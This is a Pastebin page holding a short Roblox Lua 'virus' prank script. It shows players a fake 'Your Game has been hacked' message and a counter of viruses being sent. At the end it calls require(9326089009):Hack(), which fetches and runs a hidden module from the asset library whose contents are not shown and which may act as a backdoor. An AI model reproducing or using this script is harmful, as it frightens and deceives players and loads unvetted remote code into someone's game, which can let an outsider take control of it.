Advertisement
ManFactorymaker

Funni Virus script (see their reaction lol)

May 20th, 2022 (edited)
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. local viruses = 0
  2. local man = Instance.new("Hint")
  3. man.Parent = game.Workspace
  4. man.Text = "Your Game has been hacked."
  5. --require(9326089009):Hack()
  6.  
  7. wait(2)
  8. man.Text = "Sending Viruses..."
  9.  
  10. wait(3)
  11. man.Text = "Sending Viruses 0/500"
  12. wait(1)
  13. repeat
  14. man.Text = "Sending Viruses "..viruses.."/".."500"
  15. viruses += 1
  16. wait(0.2)
  17. until
  18. viruses == 500
  19. wait(1)
  20. man.Text = "Done, Infecting game"
  21. wait(2)
  22. man:Destroy()
  23. require(9326089009):Hack()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement